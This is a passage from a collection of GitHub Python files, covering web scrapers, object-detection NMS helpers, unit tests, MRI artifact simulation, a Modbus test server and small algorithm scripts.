\", class_ids )\n# print( \"bounding_boxes = \", bounding_boxes )\n \n return tensor, class_ids, bounding_boxes\n \n \n # DataProvider supports [] operator\n # It returns images and their training targets after loading, augmenting (crop, flip, etc), and normalizing\n # TODO: should it also convert to tensor? Can't call CUDA from multiple threads, but\n # might well map iteration of DataProvider to multiple threads, so convert to CUDA tensors in the reducer?\n def __getitem__( self, key ):\n if isinstance( key, slice ):\n samples = [self._index[ i ] for i in range( *key.indices(self._num_items) ) ] # assumes Python 3 range()\n \n batch_tensors = []\n batch_class_ids = []\n batch_bounding_boxes = []\n\n for sample in samples:\n tensor, class_ids, bounding_boxes = self._get_sample( sample )\n \n batch_tensors.append( tensor )\n batch_class_ids.append( class_ids )\n batch_bounding_boxes.append( bounding_boxes )\n \n return batch_tensors, batch_class_ids, batch_bounding_boxes\n \n if key < 0:\n key += self._num_items\n # wrap-around and fall-through\n \n if key < 0 or key >= self._num_items:\n raise IndexError\n\n sample = self._index[ key ]\n tensor, class_ids, bounding_boxes = self._get_sample( sample )\n\n return tensor, class_ids, bounding_boxes\n\n \n # DataProvider is iterable\n # Iteration may apply run-time augmentation filters: crop, flip, scale, warp, color, noise\n # Iteration may load (and cache) samples on the fly\n def __len__(self):\n return len( self._index )\n\n\n def __iter__( self ):\n self._idx = 0\n return self\n\n \n def __next__( self ):\n if self._idx >= self._num_items:\n raise StopIteration\n \n sample, label = self.__getitem__( self._idx )\n self._idx += 1\n \n return sample, label\n \n \n\n #\n # Properties\n #\n \n def _get_index( self ):\n return self._index\n\n def _set_index( self, index ):\n self._index = index\n self._class_table = index.class_table\n self._path_table = index.path_table\n self._num_items = index.num_items\n \n def _get_name( self ):\n if self._index:\n return self._index.name\n else:\n return \"Unknown\"\n\n def _get_path( self ):\n if 
self._index:\n return self._index.index_path\n else:\n return \"Unknown\"\n\n def _get_class_table( self ):\n return self._class_table\n\n def _get_path_table( self ):\n return self._path_table\n \n def _get_num_items( self ):\n return self._num_items\n\n def _get_num_classes( self ):\n return len( self._class_table )\n\n def _set_transforms( self, transforms ):\n self._transforms = transforms\n \n def _get_transforms( self ):\n return self._transforms\n \n def _set_sample_size( self, sample_size ):\n self._sample_size = sample_size\n \n def _get_sample_size( self ):\n return self._sample_size\n\n def _set_crop_size( self, crop_size ):\n self._crop_size = crop_size\n \n def _get_crop_size( self ):\n return self._crop_size\n\n def _get_augment_function( self ):\n return self._augment_function\n #return _augment_function\n\n def _set_augment_function( self, augment_function ):\n if augment_function:\n self._augment_function = augment_function\n else:\n #self._augment_function = self._no_augment_center_crop\n self._augment_function = self._no_augment_no_crop\n \n def _get_load_function( self ):\n return self._load_function\n \n def _set_load_function( self, load_function ):\n self._load_function = load_function\n\n def _get_invalid_class_id( self ):\n return -1\n \n #def _get_labels( self ):\n # labels = []\n # for sample in self._index:\n # labels.append( sample.class_id )\n\n def _get_normalization( self ):\n return self._normalization\n\n def _set_normalization( self, normalization ):\n if normalization and type(normalization) != Normalization:\n print( \"DataProvider.normalization must be of type Normalization( mean, std )\" );\n return\n self._normalization = normalization\n \n\n index = property( _get_index, _set_index )\n name = property( _get_name, None )\n path = property( _get_path, None )\n class_table = property( _get_class_table, None )\n path_table = property( _get_path_table, None )\n num_items = property( _get_num_items, None )\n num_classes = property( _get_num_classes, None )\n transforms = property( _get_transforms, _set_transforms )\n sample_size = property( _get_sample_size, _set_sample_size )\n crop_size = property( _get_crop_size, _set_crop_size )\n augment_function = property( _get_augment_function, _set_augment_function )\n load_function = property( _get_load_function, _set_load_function )\n #labels = property( _get_labels, None )\n normalize = property( _get_normalization, _set_normalization )\n","repo_name":"skelleher/copper","sub_path":"data_provider.py","file_name":"data_provider.py","file_ext":"py","file_size_in_byte":13196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1453587621","text":"from decimal import Decimal\nfrom bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport urllib.request\nimport json\nimport requests\nimport re\nimport pandas as pd\n\n# link1 = 'http://www.dianping.com/brisbane/ch20/g119r81002o3'\n\n\nlink = \"https://www.bilibili.com/ranking/bangumi/13/0/7\"\n\n\ndef get_HTML(link_name):\n headers = {\n 'user-agent': 'Mozilla / 5.0(Windows NT 10.0; WOW64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / '\n '53.0.2785.104Safari / 537.36Core / 1.53.4882.400QQBrowser / 9.7.13059.400'\n }\n response = requests.get(link_name, headers=headers)\n print(response.status_code)\n response.encoding = None\n if response.status_code != 200:\n raise ConnectionError\n result = response.text\n soup = BeautifulSoup(result, 'html.parser')\n print(soup)\n return soup\n\n\ndef 
str_to_double(df_name):\n for c in range(len(df_name)):\n row = df_name[c]\n # values like '123.4万' are in units of ten thousand; plain values need no scaling\n if re.search('万', row):\n df_name[c] = Decimal(row[:-1]) * 10000\n else:\n df_name[c] = Decimal(row)\n\n\ndef manage_data():\n soup_doc = get_HTML(link)\n data = []\n i = 0\n\n soup_doc_next = soup_doc.find(\"div\", attrs={\"class\": \"rank-list-wrap\"})\n soup_doc_next_ul = soup_doc_next.find(\"ul\", attrs={\"class\": \"rank-list pgc-list\"})\n soup_find_li = soup_doc_next_ul.find_all('li')\n for s in soup_find_li:\n i += 1\n soup_find_class = s.find(\"div\", attrs={\"class\": \"content\"})\n soup_find_name = soup_find_class.find(\"img\")\n soup_find_detail = soup_find_class.find(\"div\", attrs={\"class\": \"detail\"})\n data_box = soup_find_detail.find_all(\"span\", attrs={\"class\": \"data-box\"})\n play_data = [data.text for data in data_box]\n data.append([i, soup_find_name['alt']] + play_data)\n\n columns = [\"total_rank\", \"title\", \"play\", \"comments\", \"liked\"]\n df = pd.DataFrame(data, columns=columns)\n for name in [\"play\", \"comments\", \"liked\"]:\n str_to_double(df[name])\n print(df)\n\n df.plot.bar(x='title', y=['play'])\n plt.show()\n\n\n# manage_data()\n\nget_HTML(link)\n\n","repo_name":"nexusme/leetcode_try","sub_path":"LeetCode/fetch_bilibili.py","file_name":"fetch_bilibili.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
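# --- Editor's sketch: a quick self-contained check of the intended '万'
# (ten-thousand) parsing fixed above; added for illustration only, and the
# helper name parse_bili_count is an assumption, not part of the script.
from decimal import Decimal
import re

def parse_bili_count(s):
    # '123.4万' -> Decimal('1234000'); '5678' -> Decimal('5678')
    if re.search('万', s):
        return Decimal(s[:-1]) * 10000
    return Decimal(s)

assert parse_bili_count('123.4万') == Decimal('1234000')
assert parse_bili_count('5678') == Decimal('5678')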
+{"seq_id":"33243821928","text":"import numpy as np\nimport torch\n\nfrom . import nms_rotated_ext\n\n\ndef obb2hbb(obboxes):\n \"\"\"Convert oriented bounding boxes to horizontal bounding boxes.\n\n Args:\n obboxes (torch.Tensor): [x_ctr,y_ctr,w,h,angle]\n Returns:\n hbbs (torch.Tensor): [x_lt,y_lt,x_rb,y_rb]\n \"\"\"\n center, w, h, theta = torch.split(obboxes, [2, 1, 1, 1], dim=1)\n Cos, Sin = torch.cos(theta), torch.sin(theta)\n x_bias = torch.abs(w / 2 * Cos) + torch.abs(h / 2 * Sin)\n y_bias = torch.abs(w / 2 * Sin) + torch.abs(h / 2 * Cos)\n bias = torch.cat([x_bias, y_bias], dim=1)\n return torch.cat([center - bias, center + bias], dim=1)\n\n\ndef obb_nms(dets, iou_thr, device_id=None):\n \"\"\"Compute the NMS of oriented bboxes.\"\"\"\n if isinstance(dets, torch.Tensor):\n is_numpy = False\n dets_th = dets\n elif isinstance(dets, np.ndarray):\n is_numpy = True\n device = 'cpu' if device_id is None else f'cuda:{device_id}'\n dets_th = torch.from_numpy(dets).to(device)\n else:\n raise TypeError('dets must be either a Tensor or numpy array, '\n f'but got {type(dets)}')\n\n if dets_th.numel() == 0:\n inds = dets_th.new_zeros(0, dtype=torch.int64)\n else:\n # the same issue occurs when the bboxes are too small\n too_small = dets_th[:, [2, 3]].min(1)[0] < 0.001\n if too_small.all():\n inds = dets_th.new_zeros(0, dtype=torch.int64)\n else:\n ori_inds = torch.arange(dets_th.size(0))\n ori_inds = ori_inds[~too_small]\n dets_th = dets_th[~too_small]\n\n bboxes, scores = dets_th[:, :5], dets_th[:, 5]\n inds = nms_rotated_ext.nms_rotated(bboxes, scores, iou_thr)\n inds = ori_inds[inds]\n\n if is_numpy:\n inds = inds.cpu().numpy()\n return dets[inds, :], inds\n\n\ndef poly_nms(dets, iou_thr, device_id=None):\n \"\"\"Compute the NMS of polygons.\"\"\"\n if isinstance(dets, torch.Tensor):\n is_numpy = False\n dets_th = dets\n elif isinstance(dets, np.ndarray):\n is_numpy = True\n device = 'cpu' if device_id is None else f'cuda:{device_id}'\n dets_th = torch.from_numpy(dets).to(device)\n else:\n raise TypeError('dets must be either a Tensor or numpy array, '\n f'but got {type(dets)}')\n\n if dets_th.device == torch.device('cpu'):\n raise NotImplementedError\n inds = nms_rotated_ext.nms_poly(dets_th.float(), iou_thr)\n\n if is_numpy:\n inds = inds.cpu().numpy()\n return dets[inds, :], inds\n\n\ndef obb_batched_nms(bboxes, scores, inds, nms_thr, class_agnostic=False):\n \"\"\"Compute the NMS of oriented bboxes in batches.\"\"\"\n if class_agnostic:\n bboxes_for_nms = bboxes\n else:\n hbboxes = obb2hbb(bboxes) if bboxes.size(-1) == 5 else bboxes\n max_coordinate = hbboxes.max() - hbboxes.min()\n offsets = inds.to(bboxes) * (max_coordinate + 1)\n\n if bboxes.size(-1) == 5:\n bboxes_for_nms = bboxes.clone()\n bboxes_for_nms[:, :2] = bboxes_for_nms[:, :2] + offsets[:, None]\n else:\n bboxes_for_nms = bboxes + offsets[:, None]\n\n dets, keep = obb_nms(\n torch.cat([bboxes_for_nms, scores[:, None]], -1), nms_thr)\n bboxes = bboxes[keep]\n scores = dets[:, -1]\n return torch.cat([bboxes, scores[:, None]], -1), keep\n","repo_name":"SJTU-Thinklab-Det/r3det-pytorch","sub_path":"r3det/ops/nms_rotated/nms_rotated_wrapper.py","file_name":"nms_rotated_wrapper.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"21"}
+{"seq_id":"74997000372","text":"import pytest # type: ignore\nfrom datetime import datetime, timedelta\n\nimport hopeit.toolkit.auth as auth\nfrom hopeit.app.context import EventContext, PostprocessHook\n\nfrom app0.platform.auth import logout # type: ignore\nfrom hopeit.app.errors import Unauthorized\nfrom hopeit.server.config import AuthType\nfrom . import mock_app_config, plugin_config # noqa: F401\n\n\nasync def invoke_logout(context: EventContext):\n auth_info = await logout.logout(None, context)\n assert auth_info is None\n\n\nasync def invoke_postprocess(payload: None, context: EventContext):\n hook = PostprocessHook()\n result = await logout.__postprocess__(payload, context, response=hook)\n assert hook.del_cookies == [('test_app.test.refresh', (), {'domain': None, 'path': '/'})]\n assert result == 'Logged out.'\n\n\nasync def execute_flow(context):\n await invoke_logout(context)\n await invoke_postprocess(None, context)\n\n\ndef _event_context(mock_app_config, plugin_config): # noqa: F811\n iat = datetime.now()\n timeout = plugin_config.env['auth']['access_token_expiration']\n return EventContext(\n app_config=mock_app_config,\n plugin_config=plugin_config,\n event_name='login',\n track_ids={},\n auth_info={\n 'allowed': True,\n 'auth_type': AuthType.REFRESH,\n 'payload': {'id': 'id', 'user': 'test', 'email': 'test@email', 'iat': iat,\n 'exp': iat + timedelta(seconds=timeout)}\n }\n )\n\n\n@pytest.mark.asyncio\nasync def test_logout(mock_app_config, plugin_config): # noqa: F811\n auth.init(mock_app_config.app_key(), mock_app_config.server.auth)\n context = _event_context(mock_app_config, plugin_config)\n await execute_flow(context)\n\n\n@pytest.mark.asyncio\nasync def test_logout_unauthorized(mock_app_config, plugin_config): # noqa: F811\n auth.init(mock_app_config.app_key(), mock_app_config.server.auth)\n context = _event_context(mock_app_config, plugin_config)\n context.auth_info['auth_type'] = \"UNKNOWN\"\n with pytest.raises(Unauthorized):\n await 
execute_flow(context)\n","repo_name":"fhernand23/stateless-microservices-platform","sub_path":"app0-admin/plugins/platform-auth/test/unit/test_logout.py","file_name":"test_logout.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27838708085","text":"# -*- coding: utf-8 -*-\nfrom plone.app.robotframework.testing import REMOTE_LIBRARY_BUNDLE_FIXTURE\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.testing import z2\n\nimport medialog.spacetectheme\n\n\nclass MedialogSpacetecthemeLayer(PloneSandboxLayer):\n\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n # Load any other ZCML that is required for your tests.\n # The z3c.autoinclude feature is disabled in the Plone fixture base\n # layer.\n self.loadZCML(package=medialog.spacetectheme)\n\n def setUpPloneSite(self, portal):\n applyProfile(portal, 'medialog.spacetectheme:default')\n\n\nMEDIALOG_SPACETECTHEME_FIXTURE = MedialogSpacetecthemeLayer()\n\n\nMEDIALOG_SPACETECTHEME_INTEGRATION_TESTING = IntegrationTesting(\n bases=(MEDIALOG_SPACETECTHEME_FIXTURE,),\n name='MedialogSpacetecthemeLayer:IntegrationTesting'\n)\n\n\nMEDIALOG_SPACETECTHEME_FUNCTIONAL_TESTING = FunctionalTesting(\n bases=(MEDIALOG_SPACETECTHEME_FIXTURE,),\n name='MedialogSpacetecthemeLayer:FunctionalTesting'\n)\n\n\nMEDIALOG_SPACETECTHEME_ACCEPTANCE_TESTING = FunctionalTesting(\n bases=(\n MEDIALOG_SPACETECTHEME_FIXTURE,\n REMOTE_LIBRARY_BUNDLE_FIXTURE,\n z2.ZSERVER_FIXTURE\n ),\n name='MedialogSpacetecthemeLayer:AcceptanceTesting'\n)\n","repo_name":"espenmn/spacetheme","sub_path":"medialog.spacetectheme/src/medialog/spacetectheme/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74133993971","text":"import math\nfrom pathlib import Path\n\nimport cv2\nimport numpy as np\nimport scipy.io as sio\nfrom OCTOPUS import ORC\nfrom tqdm import tqdm\n\nfrom artifactID.common import data_ops\nfrom artifactID.datagen import generate_fieldmap\n\n\ndef _gen_fieldmap(_slice, _freq_range):\n field_map, mask = generate_fieldmap.gen_smooth_b0(_slice, _freq_range) # Simulate the field map\n\n return field_map, mask\n\n\ndef orc_forwardmodel(vol: np.ndarray, freq_range: int, ktraj: np.ndarray, seq_params: dict):\n \"\"\"\n Adds off-resonance blurring to simulate B0 inhomogeneity artifacts.\n\n Parameters\n ==========\n vol : numpy.ndarray\n Image volume having dimensions N x N x N number of slices\n freq_range : int\n Frequency range for the simulated field map\n ktraj : numpy.ndarray\n k-space trajectory coordinates. 
Dimensions Npoints x Nshots\n seq_params : dict\n Sequence parameters needed for off-resonance corruption\n\n Returns\n =======\n arr_offres_vol : np.ndarray\n Corrupted image volume having dimensions Slices(with signal > 5%) x N x N\n \"\"\"\n\n seq_params['N'] = vol.shape[0]\n num_slices = vol.shape[2]\n arr_offres_vol = np.zeros(vol.shape)\n\n for ind in range(num_slices):\n slice = vol[:, :, ind]\n fieldmap, mask = _gen_fieldmap(_slice=slice, _freq_range=freq_range)\n or_corrupted = ORC.add_or_CPR(slice, ktraj, fieldmap, 1, seq_params) # Corrupt the image\n or_corrupted_norm = np.zeros(or_corrupted.shape)\n or_corrupted_norm = cv2.normalize(np.abs(or_corrupted), or_corrupted_norm, 0, 1,\n cv2.NORM_MINMAX) # Normalize [0, 1]\n arr_offres_vol[:, :, ind] = np.float16(or_corrupted_norm * mask)\n\n return arr_offres_vol\n\n\ndef main(path_read_data: Path, path_save_data: Path, path_ktraj: str, path_dcf: str, patch_size: list):\n # =========\n # LOAD PREREQUISITES\n # =========\n # 1. k-space trajectory\n ktraj = np.load(path_ktraj)\n ktraj_sc = math.pi / abs(np.max(ktraj))\n ktraj = ktraj * ktraj_sc # pyNUFFT scaling [-pi, pi]\n\n # 2. Density compensation factor\n dcf = sio.loadmat(path_dcf)['dcf_out'].flatten()\n\n # 3. Acquisition parameters\n t_vector = (np.arange(ktraj.shape[0]) * 10e-6).reshape(ktraj.shape[0], 1)\n seq_params = {'Npoints': ktraj.shape[0], 'Nshots': ktraj.shape[1], 't_vector': t_vector, 'dcf': dcf}\n\n # BraTS 2018 paths\n arr_path_read = data_ops.glob_nifti(path=path_read_data)\n\n arr_max_freq = [250, 500, 750] # Hz\n subjects_per_class = math.ceil(len(arr_path_read) / len(arr_max_freq)) # Calculate number of subjects per class\n arr_max_freq *= subjects_per_class\n np.random.shuffle(arr_max_freq)\n\n # =========\n # DATAGEN\n # =========\n for ind, path_t1 in tqdm(enumerate(arr_path_read)):\n vol = data_ops.load_nifti_vol(path=path_t1)\n freq = arr_max_freq[ind]\n vol_b0 = orc_forwardmodel(vol=vol, freq_range=freq, ktraj=ktraj, seq_params=seq_params)\n\n # Zero-pad vol, get patches, discard empty patches and uniformly intense patches and normalize each patch\n vol_b0 = data_ops.patch_compatible_zeropad(vol=vol_b0, patch_size=patch_size)\n patches, patch_map = data_ops.get_patches(vol=vol_b0, patch_size=patch_size)\n patches = data_ops.normalize_patches(patches=patches)\n\n # Save to disk\n _path_save = path_save_data.joinpath(f'b0{freq}')\n if not _path_save.exists():\n _path_save.mkdir(parents=True)\n for counter, p in enumerate(patches):\n subject = path_t1.name.replace('.nii.gz', '')\n _path_save2 = _path_save.joinpath(subject)\n _path_save2 = str(_path_save2) + f'_patch{counter}.npy'\n np.save(arr=p, file=_path_save2)\n","repo_name":"imr-framework/artifactID","sub_path":"artifactID/datagen/offres_datagen.py","file_name":"offres_datagen.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"16288434591","text":"#!/opt/local/bin/python\n#import numpy, re, sys\nimport re, sys\n\nfile = open(sys.argv[1], \"r\")\nranks = int(sys.argv[2])\nruns = int(sys.argv[3])\n\n#\n# 0 == Display Rank 0 only\n# 1 == Display Average over all ranks\ndisplay = 0\n\ndetect = list()\nrevoke = list()\nshrink = list()\nspawn = list()\nrollback = list()\nmerge = list()\n\nfor i in range(runs):\n detect.append(0)\n revoke.append(0)\n shrink.append(0)\n spawn.append(0)\n rollback.append(0)\n merge.append(0)\n\nlines = file.readlines()\n\nif display == 0:\n print(\"#RUNS: \" + 
str(runs))\n\nfor line in lines:\n values = line.split()\n if len(values) == 0 or values[0].startswith(\"#\"):\n continue\n\n run = runs - int(values[0])\n rank = int(values[1])\n\n if run > runs:\n run = runs\n break\n\n# Display the amount of time spent in each phase on rank 0\n if rank == 0 and display == 0:\n print( str(run) + \"\\t\" + \n str(float(values[2])) + \"\\t\" +\n str(float(values[3])) + \"\\t\" +\n str(float(values[4])) + \"\\t\" +\n str(float(values[5])) + \"\\t\" +\n str(float(values[6])) + \"\\t\" +\n str(float(values[7])) );\n\n detect[run] = detect[run] + float(values[2])\n revoke[run] = revoke[run] + float(values[3])\n shrink[run] = shrink[run] + float(values[4])\n spawn[run] = spawn[run] + float(values[5])\n rollback[run] = rollback[run] + float(values[6])\n merge[run] = merge[run] + float(values[7])\n\n# Display the average amount of time spent in each phase by all ranks\nif display != 0:\n print(\"#RUNS: \" + str(runs))\n for i in range(runs):\n print( str(i) + \"\\t\" + \n str(detect[i] / float(ranks - 1) ) + \"\\t\" +\n str(revoke[i] / float(ranks - 1) ) + \"\\t\" + \n str(shrink[i] / float(ranks - 1) ) + \"\\t\" + \n str(spawn[i] / float(ranks - 1) ) + \"\\t\" +\n str(rollback[i] / float(ranks - 1) ) + \"\\t\" +\n str(merge[i] / float(ranks - 1) ))\n\nexit(0)\n\n# Plot the average amount of time spent in each phase on each rank\n#print(\"#RUNS: \" + str(run))\n#for i in range(ranks):\n# detect[i].remove(min(detect[i]))\n# revoke[i].remove(min(revoke[i]))\n# shrink[i].remove(min(shrink[i]))\n# spawn[i].remove(min(spawn[i]))\n# rollback[i].remove(min(rollback[i]))\n# merge[i].remove(min(merge[i]))\n#\n# detect[i].remove(max(detect[i]))\n# revoke[i].remove(max(revoke[i]))\n# shrink[i].remove(max(shrink[i]))\n# spawn[i].remove(max(spawn[i]))\n# rollback[i].remove(max(rollback[i]))\n# merge[i].remove(max(merge[i]))\n#\n# print(str(i) + \"\\t\" +\n# str(numpy.average(detect[i])) + \"\\t\" +\n# str(numpy.average(revoke[i])) + \"\\t\" +\n# str(numpy.average(shrink[i])) + \"\\t\" +\n# str(numpy.average(spawn[i])) + \"\\t\" +\n# str(numpy.average(rollback[i])) + \"\\t\" +\n# str(numpy.average(merge[i])))\n","repo_name":"wesbland/papers","sub_path":"2012/EuroMPI-ulfm/Benchmarks/FaultRevokeShrinkSpawnJoin/time_alt.py","file_name":"time_alt.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18605939626","text":"from collections import deque\n\ndef bfs(v):\n q = deque()\n q.append(v)\n visited[v] = True\n ans = 0\n while q:\n ans += 1 # advance one degree of kinship per BFS level\n for _ in range(len(q)): # pop everything currently in the queue (one level)\n k = q.popleft()\n if k == b:\n return ans-1\n for e in arr[k]: # iterate over the neighbours from the adjacency list\n if not visited[e]: # if not visited yet\n visited[e] = True\n q.append(e) # enqueue it\n\n return -1 # return -1 when there is no kinship relation\nn = int(input())\na, b = map(int, input().split(' '))\nm = int(input())\narr = [[] for _ in range(n+1)]\nfor _ in range(m): # store the kinship edges in the adjacency list\n x, y = map(int, input().split(' '))\n arr[x].append(y)\n arr[y].append(x)\n\nvisited = [0] * (n+1) # initialise the visited array\nprint(bfs(a))","repo_name":"CukCoding/Ju","sub_path":"2022/2022-1-4주차/2644.py","file_name":"2644.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
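# --- Editor's sketch: an illustrative, stdin-free dry run of the kinship BFS
# in 2644.py above; an addition with made-up values, and kinship_degree is not
# part of the original submission.
from collections import deque

def kinship_degree(adj, a, b):
    # breadth-first distance from a to b in adjacency dict adj; -1 if unrelated
    seen = {a}
    q = deque([(a, 0)])
    while q:
        node, depth = q.popleft()
        if node == b:
            return depth
        for nxt in adj.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                q.append((nxt, depth + 1))
    return -1

assert kinship_degree({1: [2], 2: [1, 3], 3: [2]}, 1, 3) == 2
assert kinship_degree({1: [], 2: []}, 1, 2) == -1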
+{"seq_id":"2481490429","text":"\n#!/usr/bin/env python\n\"\"\"\nPymodbus Synchronous Serial Server Example\n--------------------------------------------------------------------------\nThis example starts a synchronous Modbus RTU server on a serial port and\npopulates several slave contexts, which can be helpful for testing\nmonitoring software.\n\"\"\"\n# --------------------------------------------------------------------------- # \n# import the various server implementations\n# --------------------------------------------------------------------------- # \nfrom pymodbus.server.sync import StartSerialServer\n\nfrom pymodbus.datastore import ModbusSequentialDataBlock\nfrom pymodbus.datastore import ModbusSlaveContext, ModbusServerContext\nfrom pymodbus.transaction import ModbusRtuFramer\n\n# --------------------------------------------------------------------------- # \n# configure the service logging\n# --------------------------------------------------------------------------- # \nimport logging\nFORMAT = ('%(asctime)-15s %(threadName)-15s'\n ' %(levelname)-8s %(module)-15s:%(lineno)-8s %(message)s')\nlogging.basicConfig(format=FORMAT)\nlog = logging.getLogger()\nlog.setLevel(logging.DEBUG)\n\nPORT='/dev/ttyUSB0'\n\ndef run_server():\n\n# input registers per slave: slave 1 holds [256, 258] from 40001, slave 2 holds [261, 263] from 40002, slave 4 holds [269] at 40004, slave 3 holds [258, 261] from 40005\n\n slave_store1 = ModbusSlaveContext(ir=ModbusSequentialDataBlock(40001, [256, 258]), zero_mode=True)\n slave_store2 = ModbusSlaveContext(ir=ModbusSequentialDataBlock(40002, [261, 263]), zero_mode=True)\n slave_store4 = ModbusSlaveContext(ir=ModbusSequentialDataBlock(40004, [269]), zero_mode=True)\n slave_store3 = ModbusSlaveContext(ir=ModbusSequentialDataBlock(40005, [258, 261]), zero_mode=True)\n slaves = {\n 0x01: slave_store1,\n 0x02: slave_store2,\n 0x03: slave_store3,\n 0x04: slave_store4,\n }\t\n context = ModbusServerContext(slaves=slaves, single=False)\n \n # RTU Server\n StartSerialServer(context, port=PORT, framer=ModbusRtuFramer, baudrate=38400)\n\n\nif __name__ == \"__main__\":\n run_server()\n","repo_name":"Ioana22022/cercetation","sub_path":"pymodbus/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"1453590311","text":"from decimal import Decimal\nfrom bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport urllib.request\nimport json\nimport requests\nimport re\nimport pandas as pd\n\nlink1 = 'https://www.dreamgrow.com/top-15-most-popular-social-networking-sites/'\n\n\n# link = \"https://www.bilibili.com/ranking/bangumi/13/0/7\"\n\n\ndef get_HTML(link_name):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.48 Safari/537.36 Edg/85.0.564.23',\n }\n response = requests.get(link_name, headers=headers)\n print(response.status_code)\n response.encoding = None\n if response.status_code != 200:\n raise ConnectionError\n result = response.text\n soup = BeautifulSoup(result, 'html.parser')\n # print(soup)\n return soup\n\n\ndef str_to_double(df_name):\n for c in range(len(df_name)):\n row = df_name[c]\n # values like '123.4万' are in units of ten thousand; plain values need no scaling\n if re.search('万', row):\n df_name[c] = Decimal(row[:-1]) * 10000\n else:\n df_name[c] = Decimal(row)\n\n\ndef manage_data(link_name):\n soup_doc = get_HTML(link_name)\n data = []\n i = 0\n\n soup_doc_next = soup_doc.find(\"div\", attrs={\"class\": \"rank-list-wrap\"})\n soup_doc_next_ul = soup_doc_next.find(\"ul\", attrs={\"class\": \"rank-list pgc-list\"})\n soup_find_li = soup_doc_next_ul.find_all('li')\n for s in soup_find_li:\n i += 1\n
soup_find_class = s.find(\"div\", attrs={\"class\": \"content\"})\n soup_find_name = soup_find_class.find(\"img\")\n soup_find_detail = soup_find_class.find(\"div\", attrs={\"class\": \"detail\"})\n data_box = soup_find_detail.find_all(\"span\", attrs={\"class\": \"data-box\"})\n play_data = [data.text for data in data_box]\n data.append([i, soup_find_name['alt']] + play_data)\n\n columns = [\"total_rank\", \"title\", \"play\", \"comments\", \"liked\"]\n df = pd.DataFrame(data, columns=columns)\n for name in [\"play\", \"comments\", \"liked\"]:\n str_to_double(df[name])\n print(df)\n\n df.plot.bar(x=df['title'], y=[df['play']])\n plt.show()\n\n\n# manage_data()\n\n# get_HTML(link1)\n\nsoup = get_HTML(link1)\n# print(soup)\n# soup_doc_next = soup.body.div.article.div.table.tbody\n# soup_doc_td = soup_doc_next.findAll(\"tr\")\n# final_value = []\n# final_dict = []\n# for row in soup_doc_td:\n# for next_level in row.findAll(\"a\"):\n# final_value.append(next_level.string)\n# print(final_value)\n# for i in range(0, len(final_value) - 1, 2):\n# final_dict.append({'name': final_value[i], 'value': int(final_value[i + 1].replace(',', ''))})\n# print(final_dict)\ncontent = [i.string for i in soup.body.div.article.div.table.tbody.findAll('a')]\nprint(dict(zip(content[::2], content[1::2])))\n# print(list_final)\n","repo_name":"nexusme/leetcode_try","sub_path":"LeetCode/fetch_bs4.py","file_name":"fetch_bs4.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20577599335","text":"from manygui import Application, Window, MenuBar, Menu, MenuCheck, Label, link, TextField\nfrom manygui.LayoutManagers import SimpleGridManager\n\napp = Application()\n\nwin = Window(title='Menu Example', geometry=(50,50,100,100))\nwin.layout = SimpleGridManager(1,2)\n\n# A menubar for the window.\nmbar = MenuBar()\nwin.addMenu(mbar)\n\n# A menu to choose skits.\nskitMenu = Menu(text=\"Skit\")\nmbar.add(skitMenu)\n\n# Populate the skit menu.\nlbl = Label(text=\"No skit selected\")\nwin.add(lbl)\ndef chooseSkit(ev):\n # Handle a skit choice. A menu event should have a\n # 'text' property containing the text of the menu item.\n lbl.text = ev.text\n\n# The objects returned by the add...() calls are handles that permit\n# us to operate on the menu items later.\ndedPrt = skitMenu.addCommand(text=\"Dead Parrot\")\npengTv = skitMenu.addCommand(text=\"Penguin on the Telly\")\nlink(dedPrt,chooseSkit)\nlink(pengTv,chooseSkit)\n\n# We can also supply a command to the command adder, which\n# does an implicit link() for us. 
